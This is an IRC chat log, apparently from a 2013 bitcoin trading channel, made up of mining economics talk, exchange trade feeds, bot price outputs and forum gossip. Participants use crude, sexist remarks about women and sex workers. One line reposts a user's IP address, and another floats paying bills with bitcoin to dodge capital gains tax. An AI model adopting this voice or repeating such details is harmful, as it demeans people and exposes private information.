girls haven't figured out bitcoin. Apr 28 13:46:40 stupid. Apr 28 13:47:08 well customers need to have it Apr 28 13:47:36 customers don't want their car impounded. Apr 28 13:48:00 i'm not talking about being a lazy ass cokehead and taking whatwever customers have. Apr 28 13:48:10 i'm talking about being smart. which actually many whores are. Apr 28 13:48:16 nefario? lol Apr 28 13:48:22 lmao Apr 28 13:54:40 ;;bc,hash 5000 Apr 28 13:54:42 Error: "bc,hash" is not a valid command. Apr 28 13:54:50 bah. what's the command to eval mining results ? Apr 28 13:57:02 no idea Apr 28 13:57:14 ;;genrate 5000 Apr 28 13:57:16 The expected generation output, at 5000.0 Mhps, given difficulty of 8974296.01489, is 0.280192739128 BTC per day and 0.0116746974637 BTC per hour. Apr 28 13:57:33 who is the guy left of eric in the tip photo? Apr 28 13:57:41 so people are bidding 30 btc on those blade boards for a chance to make .3 a day ? Apr 28 13:57:44 ridoinculous. Apr 28 13:58:02 Chaang-Noi he's in this chan, all i'm gonna say. Apr 28 13:58:42 iv seen him before Apr 28 13:58:46 jurov? Apr 28 13:58:49 Everything mining related is now ridiculously expensive Apr 28 13:59:00 Chaang-Noi no, jurov is in the other pic Apr 28 13:59:18 well i know iv seen him before Apr 28 13:59:26 if not met him Apr 28 13:59:44 i'm curious if you remember. Apr 28 14:00:05 burtw? Apr 28 14:00:10 Namworld yea i agree. i mean... 100 days to breakeven w/o power or any other costs Apr 28 14:00:17 and then there's going to be a ton of these deployed Apr 28 14:00:19 Chaang-Noi nah Apr 28 14:00:36 burtw is not in this chan is he Apr 28 14:00:44 well i dont know, but im pretty sure iv seen him before somewhere Apr 28 14:01:11 unless he wants to out himself... Apr 28 14:01:38 not a big deal Apr 28 14:03:49 ;;nethash Apr 28 14:03:50 72692.2434045 Apr 28 14:04:03 72th, srsly ?! Apr 28 14:04:15 boy we've grown. Apr 28 14:04:28 people are buying gpus to mine, no joke Apr 28 14:04:38 yeah at this price... Apr 28 14:04:46 and i wonder if bfl is mining with their half working shit Apr 28 14:04:59 id almost buy shit too, and then mine ltc with it Apr 28 14:05:04 but im pretty lazy Apr 28 14:05:54 AM is adding as well Apr 28 14:08:34 "if you get back all your btc, while me and others lost all our fiat, i will do everything to make the site owner life hard not to share the lost beetween customers" Apr 28 14:08:39 lol. fiat sucks. get used to it. Apr 28 14:10:07 [BTCTC] [B.YABMC] 4 @ 0.0159 = 0.0636 BTC [-] Apr 28 14:11:14 [BTCTC] [B.YABMC] 21 @ 0.0163 = 0.3423 BTC [+] Apr 28 14:12:48 [BTCTC] [LTC-MINING] 1 @ 0.4 BTC [+] Apr 28 14:14:49 [BTCTC] [PAJKA.BOND] 1 @ 0.1018 BTC [+] Apr 28 14:15:55 [BTCTC] [PAJKA.BOND] 1 @ 0.1025 BTC [+] Apr 28 14:17:45 [BTCTC] [PAJKA.BOND] 1 @ 0.103 BTC [+] Apr 28 14:18:13 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [+] Apr 28 14:24:22 [BTCTC] [GSDPT] 2 @ 0.003322 = 0.0066 BTC [+] Apr 28 14:32:01 ;;goxlag Apr 28 14:32:02 MtGox lag is 0.860826 seconds. During this time, light travels 0.00172508566571 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 28 14:32:22 13:04.26 ( Chaang-Noi ) people are buying gpus to mine, no joke Apr 28 14:32:30 they are even buying ztex fpga Apr 28 14:32:49 which is like ~1k eur for less than a GH Apr 28 14:33:00 retaded Apr 28 14:33:36 also i have seen icarus which costs 500e or something to go for 15bt Apr 28 14:33:46 a used one ofc. Apr 28 14:34:43 wow..whats next? little kids wont even be able go get that new gpu they wanted to play space warriors X for Christmas? Apr 28 14:35:06 pretty much. Apr 28 14:35:15 luckily the good gpus (ati) are useless for mining Apr 28 14:35:24 this may perversely actually destroy nvidia Apr 28 14:35:34 as we buy all their products they're losing market share in the gaming mkt. Apr 28 14:35:54 ATI are useless for mining? Thats all I used to use..hell 3 6970's gave me 1.2 Ghash Apr 28 14:36:03 or wait no Apr 28 14:36:08 i got it backwards. nvidia. Apr 28 14:36:12 nvidia..the other way round =D Apr 28 14:36:19 yeah. Apr 28 14:36:28 man did they miss the boat on that one Apr 28 14:36:48 they were looking for an entirely different market like weather modeling Apr 28 14:39:29 sorry for correcting you- easy mistake to make Apr 28 14:40:02 lol@bitpotato.com Apr 28 14:40:07 kakobrekla you saw on ebay some of the cassicus coins selling for 2k usd? Apr 28 14:40:12 people just want into btc Apr 28 14:40:13 wtf is next..tampons? Apr 28 14:40:15 yes Apr 28 14:40:16 what do you mean sorry lol. if you hadn't said anything it'd still be there lol Apr 28 14:40:20 i have some of those coins Apr 28 14:40:25 but i dont have ebay acc Apr 28 14:40:27 i have some as well Apr 28 14:40:33 yeah same here, fuck ebay Apr 28 14:40:36 Chaang-Noi ill sell for 1k to you and you sell for 2k on bay Apr 28 14:40:42 lol Apr 28 14:40:51 i have my own but thanks:) also fuck ebay:) Apr 28 14:40:56 hehe Apr 28 14:41:17 this bitcoin is getting all fucked up Apr 28 14:41:24 too main stream Apr 28 14:41:33 haha Apr 28 14:41:36 omg scam Apr 28 14:41:46 you know, thios would be pretty cool, iof instead of claiming hack Apr 28 14:41:51 just wait until paypal and western union start using it Apr 28 14:41:52 the scammer start claiming "too lame". Apr 28 14:43:30 AM selling 50 blades this time around Apr 28 14:43:43 how can i get in on them blades Apr 28 14:43:51 auction on the forum Apr 28 14:44:03 urlpls Apr 28 14:44:04 https://bitcointalk.org/index.php?topic=189248 Apr 28 14:44:10 ya it was like at 30 Apr 28 14:44:15 no paypal Apr 28 14:44:18 i was saying before, insanity. Apr 28 14:44:36 a day left still Apr 28 14:44:38 hmmm Apr 28 14:44:41 last went for 75 Apr 28 14:44:47 these should go 50 ormore Apr 28 14:44:58 top ptice is 35 now Apr 28 14:45:10 ::calc bc,convert eur Apr 28 14:45:14 da fuck tho seriously. they are 5gh/s right ? Apr 28 14:45:15 wtf Apr 28 14:45:18 im half sleep Apr 28 14:45:24 ;;bc,convert eur Apr 28 14:45:25 1 BTC = 133.83000 U.S. dollars = 102.732786 Euros Apr 28 14:45:32 also half sheep Apr 28 14:45:39 shleep Apr 28 14:45:45 btw did you see the fluorescent sheeps ? Apr 28 14:45:47 hm Apr 28 14:45:52 i dont think so Apr 28 14:46:05 they are 10 ghs Apr 28 14:46:06 http://www.nodeju.com/8327/fluorescent-sheep-born-in-uruguay.html Apr 28 14:46:09 ;;bc,genrate 1 Apr 28 14:46:11 Error: "bc,genrate" is not a valid command. Apr 28 14:46:13 ;;bc,gen 1 Apr 28 14:46:14 use the 'genrate' command instead Apr 28 14:46:19 ;;genrate 10000 Apr 28 14:46:20 dammit Apr 28 14:46:20 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 28 14:46:23 a Apr 28 14:46:41 Chaang-Noi ok so not quite insane as i originally thought. still pretty insane Apr 28 14:46:47 thats 10 jigga hash right Apr 28 14:46:53 ya Apr 28 14:46:58 sheesh Apr 28 14:47:11 and! diff is for sure 10mn by end of month Apr 28 14:47:18 or ealry next Apr 28 14:47:20 ;;bc,stats Apr 28 14:47:24 Current Blocks: 233564 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 291 blocks | Next Difficulty In About: 1 day, 21 hours, 21 minutes, and 2 seconds | Next Difficulty Estimate: 9972380.59898 | Estimated Percent Change: 11.12159 Apr 28 14:47:32 ha Apr 28 14:47:35 that bet Apr 28 14:47:37 ... Apr 28 14:47:41 ya lol Apr 28 14:47:52 like JUST on the cusp. Apr 28 14:47:58 incredible shit. Apr 28 14:48:27 so hm Apr 28 14:48:38 you need 100 days at current diff Apr 28 14:48:44 to get the money back Apr 28 14:48:48 which is more like 300 Apr 28 14:48:54 on the end Apr 28 14:49:02 if the board lives that long Apr 28 14:49:07 o look at this. Chaang-Noi apparently you're invited. Apr 28 14:49:10 "Goat MP satoshi" Apr 28 14:49:22 kakobrekla ikr? Apr 28 14:49:23 [BTCTC] [RSM] 398 @ 0.005 = 1.99 BTC [+] Apr 28 14:49:45 myea Apr 28 14:49:49 i guess im out Apr 28 14:50:24 "I purposely omitted people not in this forum from the list." Apr 28 14:50:29 see ? i'm on the forum. you're not. Apr 28 14:50:31 noob. Apr 28 14:50:59 funny list tho Apr 28 14:51:16 where is that from? Apr 28 14:51:22 https://bitcointalk.org/index.php?topic=174620.msg1965013#msg1965013 Apr 28 14:51:26 sorta informative, Apr 28 14:51:34 shows us what the noobs think are the movers and shakers. Apr 28 14:51:36 sirius etc. Apr 28 14:51:51 sorta like asking the tv crowd their idea on who runs america Apr 28 14:52:09 "that rap producer guy, that boxing promoter guy, obama and that chick on twitter". Apr 28 14:53:14 hm Apr 28 14:53:18 im not on the list. Apr 28 14:53:24 "The reason there are pledges, which cost more and more when the # of participants is increasing, is that otherwise I would benefit too much from the tickets. The ticket income increases quadratically with the number of admissions, the costs go up perhaps in the 1.5th power. " Apr 28 14:53:31 this math. bitcoin is based on it. Apr 28 14:54:07 maff Apr 28 14:56:10 imma just a sub node sector zappa 6b Apr 28 14:56:17 not relevant enough :( Apr 28 14:58:11 http://vimeo.com/26149808 Apr 28 15:06:46 [BTCTC] [ASICMINER-PT] 2 @ 1.299 = 2.598 BTC [+] Apr 28 15:06:55 [BTCTC] [ASICMINER-PT] 2 @ 1.299 = 2.598 BTC [+] Apr 28 15:06:59 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] Apr 28 15:08:37 [BTCTC] [ASICMINER-PT] 2 @ 1.299899 = 2.5998 BTC [+] Apr 28 15:08:47 [BTCTC] [ASICMINER-PT] 25 @ 1.3 = 32.5 BTC [+] Apr 28 15:08:52 [BTCTC] [ASICMINER-PT] 5 @ 1.3 = 6.5 BTC [+] Apr 28 15:09:00 [BTCTC] [ASICMINER-PT] 14 @ 1.3 = 18.2 BTC [+] Apr 28 15:10:15 kakobrekla The mystery man came over and he said "I'm outta sight!" Apr 28 15:10:15 He said for a nominal service charge I could reach nirvana tonight Apr 28 15:12:33 I wouldnt mind reaching nirvana at some point..i'm sure it involves a long legged blonde at some point Apr 28 15:12:56 d'oh Apr 28 15:19:45 ;;next Apr 28 15:19:45 targets: 150, 160-164 | resistance: 136, 140 | support: 120, 118-114, 106-103 | updated by OneFixt at Apr 28 2013, 00:29 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 11 hours, 50 minutes, and 42 seconds ago Apr 28 15:23:55 mp yeah i said you got invited and yeah me too, right along with satoshi, lulz Apr 28 15:25:14 mp that list is mostly people from the wall obeservation thread Apr 28 15:25:14 i would not mind going to findland but i really dont think much will come of this Apr 28 15:26:21 [MPEX] [S.MPOE] 5000 @ 0.00066644 = 3.3322 BTC [-] Apr 28 15:26:23 [MPEX] [S.MPOE] 5150 @ 0.00066643 = 3.4321 BTC [-] Apr 28 15:27:52 lol what? Apr 28 15:28:03 [MPEX] [S.DICE] 1200 @ 0.00300427 = 3.6051 BTC [-] Apr 28 15:31:00 wow dat AM auction, and still one day left Apr 28 15:37:58 these call options are overpriced... Apr 28 15:38:14 $195 is best breakeven Apr 28 15:39:17 Mp backstop ;) Apr 28 15:39:39 so now we need 50% swings to make any money... Apr 28 15:39:50 bastion of satbility that is Apr 28 15:39:54 stability* Apr 28 15:40:17 how many 50% swing this month ? Apr 28 15:40:52 4? 5? Apr 28 15:41:25 except when it was factoring those it was even worse Apr 28 15:41:52 also, what about the 2years of history before Apr 28 15:42:09 your point makes sense Apr 28 15:42:17 but it also cripples options Apr 28 15:52:44 [MPEX] [O.USD.P161T] 1 @ 0.79690016 BTC Apr 28 15:53:46 Haha, Apr 28 15:54:04 [MPEX] [O.USD.C107T] 3 @ 0.45517597 = 1.3655 BTC [-] Apr 28 15:54:29 there :/ Apr 28 15:54:41 i'll dabble Apr 28 15:54:46 i'm with you for the call Apr 28 15:56:03 just need one drama monday Apr 28 15:57:25 error4733 ya lol Apr 28 15:59:28 black april is not finish yet... be ready for the final Apr 28 16:00:11 "You can easily buy money with coolness. You can hardly buy coolness with money." Apr 28 16:00:23 dude this thread is gomedy cold. Apr 28 16:02:01 kakobrekla wtf, is assets +i now ? Apr 28 16:02:23 ops Apr 28 16:02:25 my bad Apr 28 16:02:50 ppl were like "invite me plz" i was wtf ?! Apr 28 16:03:12 ya well I started talking shit about obama and next thing i know my power went out Apr 28 16:03:47 i was kicked? Apr 28 16:03:52 not yet Apr 28 16:03:57 Chaang-Noi well ironically i usually go to finland/estonia/whatever in summer Apr 28 16:04:05 but april kinda early. Apr 28 16:05:05 * Cannot join #bitcoin-assets (Channel is invite only). Apr 28 16:05:11 well its in may but still Apr 28 16:05:25 id be tempted to go if some other btc people were going but its too soon Apr 28 16:06:01 i kinda don't like these "let's do something everything" affairs tbh. Apr 28 16:06:32 yeah, i dont see what will be done, i also dont see who is going Apr 28 16:07:14 Thank you Mircea, you were the only one I could think of. Who can I msg next time or who is ops that is usually here Apr 28 16:08:20 i don't have ops lol Apr 28 16:09:30 kako has ops Apr 28 16:14:01 kakobrekla if you want +i you probably need to add a whole list of +I first Apr 28 16:14:07 might not even be the worst idea. Apr 28 16:14:49 of course +r has the disadvantage that all the noob chicks wanting to go topless mpoe-pr keeps sending over won't be able to get it anymoar. Apr 28 16:19:04 !t m ^oix Apr 28 16:19:05 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 53.96737151 / 197.9610204 / 305.88369172 (94 shares, 7.88 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 28 16:19:12 200 eh. Apr 28 16:19:40 wtf Apr 28 16:19:45 damnit gribble Apr 28 16:20:10 noobs are buying up those potatos Apr 28 16:29:17 [BTCTC] [ASICMINER-PT] 1 @ 1.3085 BTC [+] Apr 28 16:34:40 [BTCTC] [ASICMINER-PT] 2 @ 1.3086 = 2.6172 BTC [+] Apr 28 16:36:59 [BTCTC] [ASICMINER-PT] 2 @ 1.3085 = 2.617 BTC [-] Apr 28 16:46:00 [BTCTC] [ASICMINER-PT] 1 @ 1.3085 BTC [-] Apr 28 16:47:14 [BTCTC] [S.DICE-PT] 8 @ 0.00275 = 0.022 BTC [-] Apr 28 16:47:36 [BTCTC] [ASICMINER-PT] 4 @ 1.3086 = 5.2344 BTC [+] Apr 28 16:52:25 [BTCTC] [ASICMINER-PT] 3 @ 1.3086 = 3.9258 BTC [+] Apr 28 16:52:40 [BTCTC] [B.YABMC] 1 @ 0.0163 BTC [+] Apr 28 16:53:04 [BTCTC] [RSM] 1 @ 0.005 BTC [+] Apr 28 16:57:53 or +m and have a voicelist Apr 28 16:58:14 but whatever it will be, it will be after the boobs are found. Apr 28 16:58:50 [BTCTC] [RSM] 316 @ 0.005 = 1.58 BTC [+] Apr 28 17:01:37 yeah. trilema is +m and voicelisted. Apr 28 17:03:19 anyone know this cat Betcoin was 6d825f55@gateway/web/freenode/ip.109.130.95.85 * 109.130.95.85 Apr 28 17:05:06 [BTCTC] [ASICMINER-PT] 9 @ 1.28 = 11.52 BTC [-] Apr 28 17:13:18 [MPEX] [S.MPOE] 15000 @ 0.00065421 = 9.8132 BTC [-] Apr 28 17:13:20 [MPEX] [S.MPOE] 3450 @ 0.0006524 = 2.2508 BTC [-] Apr 28 17:23:17 [BTCTC] [ASICMINER-PT] 1 @ 1.308 BTC [+] Apr 28 17:23:22 [BTCTC] [ASICMINER-PT] 1 @ 1.3088 BTC [+] Apr 28 17:23:27 [BTCTC] [ASICMINER-PT] 1 @ 1.319 BTC [+] Apr 28 17:23:31 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [+] Apr 28 17:28:40 [MPEX] [S.MPOE] 27200 @ 0.00066367 = 18.0518 BTC [+] Apr 28 17:28:41 [MPEX] [S.MPOE] 3511 @ 0.00067064 = 2.3546 BTC [+] Apr 28 17:39:43 [BTCTC] [ASICMINER-PT] 2 @ 1.32 = 2.64 BTC [+] Apr 28 17:48:48 [BTCTC] [B.YABMC] 6 @ 0.015 = 0.09 BTC [-] Apr 28 17:50:53 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 28 17:51:52 [MPEX] [S.MPOE] 9851 @ 0.00067648 = 6.664 BTC [+] Apr 28 17:53:44 [BTCTC] [BITVPS] 55 @ 0.001887 = 0.1038 BTC [+] Apr 28 18:03:52 nice to see AM at 1.28 bids:) Apr 28 18:04:00 should be really nice this time next week Apr 28 18:06:17 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 28 18:14:06 [BTCTC] [ASICMINER-PT] 1 @ 1.3199 BTC [+] Apr 28 18:16:09 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Apr 28 18:16:24 [BTCTC] [ASICMINER-PT] 1 @ 1.29 BTC [-] Apr 28 18:39:52 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1998 = 0.3996 BTC [-] Apr 28 18:41:13 http://www.os-fashion.com/vcs-think-my-boobs-need-an-algorithm/ chick knows her shit. Apr 28 19:09:02 There are currently 161577.74 bitcoins demanded at or over 50.0 USD, worth 13993939.8375 USD in total. | Data vintage: 0.0085 seconds Apr 28 19:09:09 There are currently 75062.168 bitcoins offered at or under 200.0 USD, worth 12494310.4521 USD in total. | Data vintage: 6.0760 seconds Apr 28 19:11:29 tiberiusiv: can we be friends? Apr 28 19:11:45 Or do you only take payment in bitcoin for your friend services? Apr 28 19:12:52 ;;ticker Apr 28 19:12:53 BTCUSD ticker | Best bid: 136.00010, Best ask: 136.04000, Bid-ask spread: 0.03990, Last trade: 136.04000, 24 hour volume: 53937.13488029, 24 hour low: 122.71000, 24 hour high: 136.68000, 24 hour vwap: 129.76267 Apr 28 19:14:21 mircea_popescu wouldn't you say this quote also applies to Paul Graham? >> " the crappy start-ups that got funding at high valuations are struggling and are unable to get Series B funding, dropping like flies, creating a tech bubble" Apr 28 19:15:14 writing brb. Apr 28 19:16:09 Also mircea_popescu apparently she's the CEO of the company that produces this: http://www.blueseventy.com/products/2012-helix-full-suit Apr 28 19:16:34 thestringpuller http://trilema.com/2013/mind-your-step/ Apr 28 19:16:56 aha ? not bad Apr 28 19:18:41 Alright mircea_popescu you win, lemme send you more coin for your paywall Apr 28 19:18:52 .01 gets me how many credits? Apr 28 19:19:05 ;;ticker Apr 28 19:19:07 BTCUSD ticker | Best bid: 135.60000, Best ask: 136.04000, Bid-ask spread: 0.44000, Last trade: 136.04000, 24 hour volume: 54078.06233830, 24 hour low: 122.71000, 24 hour high: 136.68000, 24 hour vwap: 129.78047 Apr 28 19:19:14 like 1.3k Apr 28 19:19:20 lets do un/pw this time Apr 28 19:19:32 un/pw ? Apr 28 19:19:38 username password Apr 28 19:19:42 instead of based on ip Apr 28 19:20:01 don't subscribe to the NYT Apr 28 19:20:10 when you can use it as TP instead :P Apr 28 19:20:11 a ywes. kk. Apr 28 19:20:25 what address should I send to? Apr 28 19:22:35 [BTCTC] [ASICMINER-PT] 1 @ 1.2911 BTC [+] Apr 28 19:22:45 [BTCTC] [ASICMINER-PT] 1 @ 1.291 BTC [-] Apr 28 19:24:30 [BTCTC] [ASICMINER-PT] 1 @ 1.291 BTC [-] Apr 28 19:25:39 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [-] Apr 28 19:26:11 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [+] Apr 28 19:37:53 so apparently mtgox is writing a new trade engine Apr 28 19:37:56 in brainfuck. Apr 28 19:38:04 [HAVELOCK] [VTX] 10 @ 0.4399 = 4.399 BTC [+] Apr 28 19:38:20 ++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>. Apr 28 19:39:04 [HAVELOCK] [VTX] 2 @ 0.4399 = 0.8798 BTC [+] Apr 28 19:41:04 [HAVELOCK] [VTX] 1 @ 0.4399 BTC [+] Apr 28 19:41:06 [HAVELOCK] [VTX] 2 @ 0.4399 = 0.8798 BTC [+] Apr 28 19:41:19 mircea_popescu: I once wrote a FORTH to Brainfuck compiler. Betcha they dug it out from the sands of time and are using it. Apr 28 19:41:38 was it under 256 bytes ? Apr 28 19:41:56 mircea_popescu: close to that Apr 28 19:42:08 should fit in ram over 9000 times then Apr 28 19:42:10 mircea_popescu: try it yourself, it isn't hard Apr 28 19:44:04 [HAVELOCK] [VTX] 1 @ 0.44 BTC [+] Apr 28 19:48:50 mircea_popescu I feel as though you allude the biggest problem bitcoin faces is arrogance amongst n00bs... Apr 28 19:49:11 nah. Apr 28 19:49:12 "I bought in at 10 dollars, now I'm rich" bullshit etc. Apr 28 19:49:28 well not unless you expand noobs to mean everyone. Apr 28 19:49:36 i guess arrogance is the universal problem. Apr 28 19:49:49 I would say Keiser is still a n00b. Apr 28 19:49:55 "i'm too cool to suck cock" "i don't need to learn math" "why should i stop for red lights" etc. Apr 28 19:50:00 He just happens to have money in the bank. Apr 28 19:50:22 but people who say, "I don't need to learn math" end up coming up short when you give them money to do business. Apr 28 19:50:25 Like EVERYTIME Apr 28 19:50:37 "Oh I thought you wanted 1.40 per sale not 2 dollars" Apr 28 19:51:14 Okay maybe arrogance isn't the proper word. Apr 28 19:51:19 How about "delusional" Apr 28 19:51:40 problem is, "why should I stop for red light" is mere Darwin-food when the noob has a motorcycle. In the case of BTC, he has a trailer loaded with bricks. Apr 28 19:51:44 well yes. the divergence between reality and representation and the complacency with the situation. source of all trouble. Apr 28 19:53:02 asciilifeform then you question the wisdom of only allowing people on motorcycles until they show they drive well :D Apr 28 19:54:23 mircea_popescu: I'm for the "mandatory pedestrian ram" plus "automatic liability of idiots" - method of traffic regulation. Apr 28 19:54:39 [BTCTC] [ASICMINER-PT] 1 @ 1.2701 BTC [-] Apr 28 19:54:44 [BTCTC] [ASICMINER-PT] 1 @ 1.27 BTC [-] Apr 28 19:55:18 a la https://en.wikipedia.org/wiki/Quarantine_(video_game) Apr 28 19:55:34 hey. Apr 28 19:55:38 you ever played death track ? Apr 28 19:56:04 [HAVELOCK] [VTX] 5 @ 0.4588 = 2.294 BTC [+] Apr 28 19:56:04 lol death track Apr 28 19:56:04 yes Apr 28 19:56:05 [HAVELOCK] [VTX] 2 @ 0.46 = 0.92 BTC [+] Apr 28 19:56:12 yeah. back in like 1990 Apr 28 19:56:18 i didn't know they had video games in romania Apr 28 19:56:23 we had gta, except only the cool kids with computers played it Apr 28 19:56:31 HAHAHAHAHA Apr 28 19:56:32 omg Apr 28 19:56:34 quote stolen Apr 28 19:56:41 lol Apr 28 19:57:25 http://polimedia.us/dtng/c/src/136706164156.jpg < who is the guy on the top picture? Apr 28 19:57:29 btw Apr 28 19:57:41 thestringpuller some forum clown Apr 28 19:58:02 is that the "Class X BTC Supernode" fellow? Apr 28 19:58:04 [HAVELOCK] [VTX] 5 @ 0.46 = 2.3 BTC [+] Apr 28 20:00:10 yea Apr 28 20:01:46 mircea_popescu seems the billpay idea actually is working... Apr 28 20:02:11 which one is that ? Apr 28 20:03:04 [HAVELOCK] [SDICE] 1 @ 0.312 BTC [-] Apr 28 20:03:05 [HAVELOCK] [SDICE] 1 @ 0.31200001 BTC [+] Apr 28 20:03:06 [HAVELOCK] [SDICE] 1 @ 0.31499999 BTC [+] Apr 28 20:03:07 [HAVELOCK] [SDICE] 13 @ 0.315 = 4.095 BTC [+] Apr 28 20:03:08 [HAVELOCK] [SDICE] 7 @ 0.31999995 = 2.24 BTC [+] Apr 28 20:03:09 [HAVELOCK] [SDICE] 1 @ 0.31999998 BTC [+] Apr 28 20:03:32 mircea_popescu: http://billpayforcoins.com/ Apr 28 20:03:42 i'm sure that's crossed your browser at some point Apr 28 20:04:06 [BTCTC] [B.YABMC] 10 @ 0.0163 = 0.163 BTC [+] Apr 28 20:04:13 Update - 4/25/2013 Apr 28 20:04:13 Thank you all for checking us out. We are currently working on restructuring our payment backend to be in full compliance with all government regulations. We will be back up as soon as all our ducks are in a row. Apr 28 20:04:17 i guess so much for it working. Apr 28 20:04:37 OH WOW Apr 28 20:04:38 hahahaha Apr 28 20:04:40 v.interesting, would the coins you spend that way be liable for any taxation as a benefit in kind ? Apr 28 20:04:57 troc: wouldn't that depend on where you pay from? Apr 28 20:05:09 pay via a server in africa I wouldn't think so... Apr 28 20:05:33 WHO THE FUCK IS THIS CLOWN Apr 28 20:05:35 Riley Alexander Apr 28 20:05:36 Co - Founder, Idea Engine, Master Hand Shaker Apr 28 20:05:41 Idea Engine? Apr 28 20:05:44 MASTER HAND SHAKER? Apr 28 20:06:02 "Two-Bit Entrepreneur" Apr 28 20:06:05 [HAVELOCK] [VTX] 6 @ 0.468 = 2.808 BTC [+] Apr 28 20:06:06 [BTCTC] [ASICMINER-PT] 1 @ 1.298 BTC [+] Apr 28 20:06:15 [BTCTC] [ASICMINER-PT] 1 @ 1.299 BTC [+] Apr 28 20:06:30 well i dunno wtf that's all about. here you can pay other people's bills Apr 28 20:06:35 i should know. Apr 28 20:07:04 [HAVELOCK] [VTX] 3 @ 0.4701 = 1.4103 BTC [+] Apr 28 20:07:36 come again mircea_popescu ? Apr 28 20:07:54 i don't see what regulations they would be breaking. Apr 28 20:08:01 so i pay X's bill. sooo ? Apr 28 20:08:09 ah Apr 28 20:08:31 I'm just sick of bitcoin entrepreneurs Apr 28 20:08:42 it's becoming worse than YCombinator shit Apr 28 20:09:07 "Hey man I have this AWESOME idea. Girls need bra's right? LETS MAKE A WEBSITE TO GET CUSTOM BRAS" Apr 28 20:09:22 As if Victoria Secret doesn't have that market seized already... Apr 28 20:09:47 billpay : say its the mortgage, it could be a neat way to avoid capital gains on BTC no ? Apr 28 20:12:37 thestringpuller but no panties. Apr 28 20:13:23 actually there was this french brand made a fortune by selling bra and panty sets Apr 28 20:13:32 except they had one bra and FIVE matching panties in the pack. Apr 28 20:13:38 wish i could recall da fuck it was called. Apr 28 20:15:56 [BTCTC] [ASICMINER-PT] 1 @ 1.3297 BTC [+] Apr 28 20:16:01 [BTCTC] [ASICMINER-PT] 1 @ 1.3298 BTC [+] Apr 28 20:16:47 [BTCTC] [ASICMINER-PT] 1 @ 1.2801 BTC [-] Apr 28 20:18:22 [BTCTC] [SYNERGY] 1 @ 0.115 BTC [+] Apr 28 20:22:02 [BTCTC] [ASICMINER-PT] 1 @ 1.32989 BTC [+] Apr 28 20:22:08 [BTCTC] [ASICMINER-PT] 10 @ 1.32999 = 13.2999 BTC [+] Apr 28 20:22:23 [BTCTC] [ASICMINER-PT] 7 @ 1.331 = 9.317 BTC [+] Apr 28 20:22:32 [BTCTC] [ASICMINER-PT] 1 @ 1.333334 BTC [+] Apr 28 20:27:35 [BTCTC] [ASICMINER-PT] 1 @ 1.337 BTC [+] Apr 28 20:28:03 [HAVELOCK] [SDICE] 27 @ 0.32 = 8.64 BTC [+] Apr 28 20:28:49 [MPEX] [S.DICE] 1000 @ 0.00302262 = 3.0226 BTC [+] Apr 28 20:32:24 [MPEX] [S.DICE] 3020 @ 0.00302263 = 9.1283 BTC [+] Apr 28 20:32:55 [BTCTC] [ASICMINER-PT] 1 @ 1.346 BTC [+] Apr 28 20:34:44 moar? https://bitcointalk.org/index.php?topic=188735.0 Apr 28 20:42:52 [BTCTC] [ASICMINER-PT] 1 @ 1.3202 BTC [-] Apr 28 20:43:23 [BTCTC] [ASICMINER-PT] 1 @ 1.3202 BTC [-] Apr 28 20:43:34 Our model Our platform is designed to allow the trading of bitcoin for bitcoin. Apr 28 20:43:37 logical. Apr 28 20:43:45 Who's behind it? Our team consists of seasoned traders with experience in some of the worlds most successful banks, investment banks and accounting firms. Apr 28 20:43:50 sigh. Apr 28 20:44:24 hm Apr 28 20:45:51 well, dunno why is it so cryptic about it Apr 28 20:45:56 >BTC.sx is funded privately. We operate with a tier 1 total capital ratio level of 110% minimum. Apr 28 20:46:00 >Our team consists of seasoned traders with experience in some of the worlds most successful banks, investment banks and accounting firms. Apr 28 20:46:09 who again? Apr 28 20:48:54 his mom. Apr 28 20:49:22 "From what I've googled, I understand that scalping helps lower spreads but ultimately, aren't you just betting upon a upward or downward price movement?" Apr 28 20:49:25 him in 2012. Apr 28 20:49:36 meanwhile experience happened. at the world's most successful banks Apr 28 20:49:40 apostrophe's on me. Apr 28 20:57:31 wrong channel Apr 28 20:59:33 [BTCTC] [ASICMINER-PT] 2 @ 1.32 = 2.64 BTC [-] Apr 28 21:00:43 [BTCTC] [ASICMINER-PT] 1 @ 1.339 BTC [+] Apr 28 21:01:44 [BTCTC] [ASICMINER-PT] 2 @ 1.34698 = 2.694 BTC [+] Apr 28 21:03:27 [MPEX] [O.USD.C134T] 85 @ 0.35903146 = 30.5177 BTC [+] Apr 28 21:04:59 [BTCTC] [ASICMINER-PT] 1 @ 1.3171 BTC [-] Apr 28 21:08:16 [BTCTC] [ASICMINER-PT] 1 @ 1.3 BTC [-] Apr 28 21:21:02 [MPEX] [S.MPOE] 5600 @ 0.00065476 = 3.6667 BTC [-] Apr 28 21:21:03 [MPEX] [S.MPOE] 3250 @ 0.0006524 = 2.1203 BTC [-] Apr 28 21:21:06 [MPEX] [S.MPOE] 4450 @ 0.00064 = 2.848 BTC [-] Apr 28 21:31:48 ;;nethash Apr 28 21:31:49 73988.0257577 Apr 28 21:31:52 ;;tslb Apr 28 21:31:58 Time since last block: 3 minutes and 7 seconds Apr 28 21:32:01 ;;estimate Apr 28 21:32:03 Next difficulty estimate | 9973647.0479 based on data since last change | 10335850.0809 based on data for last three days Apr 28 21:36:49 [BTCTC] [GSDPT] 40 @ 0.00301 = 0.1204 BTC [-] Apr 28 